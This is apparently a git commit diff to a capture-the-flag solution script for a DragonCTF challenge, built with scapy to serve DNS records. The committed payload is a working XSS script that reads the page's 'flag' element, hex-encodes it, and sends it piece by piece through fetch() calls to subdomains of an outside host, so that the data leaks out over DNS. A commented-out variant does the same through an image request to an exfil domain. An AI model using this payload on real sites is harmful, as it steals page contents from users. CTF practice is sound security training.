add the right payload lol

stong · stong · commit d5a079ca7932 · 2020-11-23T05:33:29.000-05:00
diff --git a/2020/dragonctf/coolname/server.py b/2020/dragonctf/coolname/server.py
@@ -2,8 +2,7 @@
 from scapy.all import DNS, DNSQR, DNSRR, raw
 
 
-xss = 'a="";document.getElementById("flag").innerText.split("").forEach((r)=>{a+=r.charCodeAt(0).toString(16)});a=a.substring(0,40);'
-payload = '<img/src="http://ffffffuck.6d5c01f74b3f86e79153.d.zhack.ca"/>'
+payload = '<script>a=``;document.getElementById(`flag`).innerText.split(``).forEach((r)=>{a+=r.charCodeAt(0).toString(16)});fetch(`http://`+a.length+`.026d0fea5c4ad465e920.d.zhack.ca`);a.match(/.{1,55}/g).forEach((r,a)=>{fetch(`http://`+String(a)+`_`+r+`.62bf1cf869b968a6f40d.d.zhack.ca`)});</script>'
 # payload = '</pre><script>a="";document.getElementById("flag").innerText.split("").forEach((r)=>{a+=r.charCodeAt(0).toString(16)});a=a.substring(0,40);document.createElement("img").src="http://"+a+".dns.exfil.com/x.png";</script>'
 
 log = open('log.txt', 'w+b')
